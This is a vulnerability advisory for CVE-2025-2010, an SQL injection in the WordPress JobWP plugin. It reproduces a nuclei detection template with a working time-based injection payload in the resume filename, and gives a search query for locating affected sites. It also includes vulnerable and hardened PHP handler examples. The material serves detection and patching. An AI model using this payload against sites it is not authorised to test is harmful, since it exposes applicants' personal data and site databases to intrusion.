WordPress JobWP Plugin SQL Injection Vulnerability

Vulnerability Information

Vulnerability name: WordPress JobWP Plugin SQL Injection Vulnerability

Vulnerability ID:

  • CVE: CVE-2025-2010

Vulnerability type: SQL injection

Severity: Critical

Description: JobWP is a WordPress plugin for creating and managing job boards, job listings, career pages and recruitment features. It is widely used on corporate and recruitment sites to let administrators publish job postings and collect applicants' résumés. Versions 2.3.9 and earlier contain an SQL injection vulnerability that an attacker can exploit through the unvalidated 'jobwp_upload_resume' parameter. The root cause is insufficient escaping of the user-supplied parameter combined with a lack of sufficient preparation of the existing SQL query. This lets unauthenticated attackers append additional SQL queries to the existing query and potentially extract sensitive information from the database. An attacker who successfully exploits the flaw can execute arbitrary SQL queries, potentially leading to data leakage, privilege escalation or other malicious activity. Because exploitation requires no authentication and can be automated, the flaw poses a serious threat to sites running affected versions of the plugin. Users are advised to update JobWP to a version later than 2.3.9 immediately, or to implement appropriate input validation and sanitization controls.

Vendor: WordPress

Product: JobWP - Job Board, Job Listing, Career Page and Recruitment Plugin

Affected versions: version <= 2.3.9

Search query: body="/wp-content/plugins/jobwp"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/26935ff95bd62ad1fb33c918d35549095f3bc115/http%2Fcves%2F2025%2FCVE-2025-2010.yaml

Type: projectdiscovery/nuclei-templates:github issues

PoC Details


id: CVE-2025-2010

info:
  name: WordPress JobWP Plugin <= 2.3.9 - SQL Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    The JobWP - Job Board, Job Listing, Career Page and Recruitment Plugin plugin for WordPress is vulnerable to SQL Injection via the 'jobwp_upload_resume' parameter in all versions up to, and including, 2.3.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
  impact: |
    Successful exploitation could allow an attacker to execute arbitrary SQL queries, potentially leading to data exfiltration, privilege escalation, or other malicious activities.
  remediation: |
    Update the JobWP Plugin to version later than 2.3.9. Alternatively, implement proper input validation and sanitization controls.
  reference:
    - https://wpscan.com/vulnerability/26713902-26d8-47e3-b651-fe30d9898270/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-2010
  classification:
    cve-id: CVE-2025-2010
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 1
    product: jobwp
    fofa-query: body="/wp-content/plugins/jobwp"
  tags: cve,cve2025,wp,wordpress,wp-plugin,sqli,jobwp

flow: http(1) && http(2)

variables:
  jobid: "{{jobid}}"

http:
  - raw:
      - |
        GET /jobs/{{jobid}}/ HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        name: nonce
        group: 1
        regex:
          - 'jobwp_apply_form_nonce_field" value="([a-z0-9]+)"'
        internal: true

  - raw:
      - |
        @timeout: 30s
        POST /jobs/{{jobid}}/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEUzdqU65JI5EA04B

        ------WebKitFormBoundaryEUzdqU65JI5EA04B
        Content-Disposition: form-data; name="jobwp_apply_form_nonce_field"

        {{nonce}}
        ------WebKitFormBoundaryEUzdqU65JI5EA04B
        Content-Disposition: form-data; name="x"

        /jobs/{{jobid}}/
        ------WebKitFormBoundaryEUzdqU65JI5EA04B
        Content-Disposition: form-data; name="jobwp_apply_for"

        x
        ------WebKitFormBoundaryEUzdqU65JI5EA04B
        Content-Disposition: form-data; name="jobwp_full_name"

        x
        ------WebKitFormBoundaryEUzdqU65JI5EA04B
        Content-Disposition: form-data; name="jobwp_email"

        x@x.com
        ------WebKitFormBoundaryEUzdqU65JI5EA04B
        Content-Disposition: form-data; name="jobwp_cover_letter"

        x
        ------WebKitFormBoundaryEUzdqU65JI5EA04B
        Content-Disposition: form-data; name="jobwp_upload_resume"; filename="xxxxxx\"*sleep(7)*\".pdf"
        Content-Type: application/pdf

        x
        ------WebKitFormBoundaryEUzdqU65JI5EA04B--

    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - "status_code == 200"
          - "contains_all(body, 'jobwp-', 'apply-')"
        condition: and
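The template above shows the defect class, not the fix. The following is an added example, hypothetical WordPress handler code and not JobWP's own source, that places a vulnerable application-form handler next to a hardened one; the table name, column names and nonce action name are assumptions.

```php
<?php
// Hypothetical WordPress application-form handler (not JobWP's actual code)
// illustrating the defect behind CVE-2025-2010 and its repair.
// The table, columns and nonce action 'jobwp_apply_form' are assumed names.

// VULNERABLE: the client-supplied upload filename is interpolated into SQL as
// a double-quoted literal. A filename containing a double quote (as in the
// PoC above) closes the literal, and whatever follows is parsed as SQL.
function jobwp_demo_save_application_vulnerable( $wpdb ) {
    $name  = $_POST['jobwp_full_name'];
    $email = $_POST['jobwp_email'];
    $file  = $_FILES['jobwp_upload_resume']['name'];
    $wpdb->query(
        "INSERT INTO {$wpdb->prefix}jobwp_applications (full_name, email, resume)
         VALUES (\"{$name}\", \"{$email}\", \"{$file}\")"
    );
}

// HARDENED: the form nonce is still checked, but note that it is not a defence
// against this bug (the template's first request reads it from the public job
// page). The fix is sanitizing the inputs and letting $wpdb->insert() bind
// them with explicit format specifiers so input cannot alter query structure.
function jobwp_demo_save_application_fixed( $wpdb ) {
    $nonce = isset( $_POST['jobwp_apply_form_nonce_field'] )
        ? $_POST['jobwp_apply_form_nonce_field'] : '';
    if ( ! wp_verify_nonce( $nonce, 'jobwp_apply_form' ) ) {
        wp_die( 'Invalid request.', '', array( 'response' => 403 ) );
    }
    $name  = sanitize_text_field( wp_unslash( $_POST['jobwp_full_name'] ?? '' ) );
    $email = sanitize_email( wp_unslash( $_POST['jobwp_email'] ?? '' ) );
    // sanitize_file_name() strips quotes and other special characters, and the
    // extension allow-list rejects names that are not plausible résumés.
    $file  = sanitize_file_name( $_FILES['jobwp_upload_resume']['name'] ?? '' );
    $ext   = strtolower( pathinfo( $file, PATHINFO_EXTENSION ) );
    if ( '' === $name || ! is_email( $email )
        || ! in_array( $ext, array( 'pdf', 'doc', 'docx' ), true ) ) {
        wp_die( 'Invalid application data.', '', array( 'response' => 400 ) );
    }
    $rows = $wpdb->insert(
        $wpdb->prefix . 'jobwp_applications',
        array( 'full_name' => $name, 'email' => $email, 'resume' => $file ),
        array( '%s', '%s', '%s' )  // every value is bound as a string
    );
    return false !== $rows;
}
```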


Author: lianccc
Published: July 9, 2025
Source URL: http://example.com/2025/07/09/github_2993396424/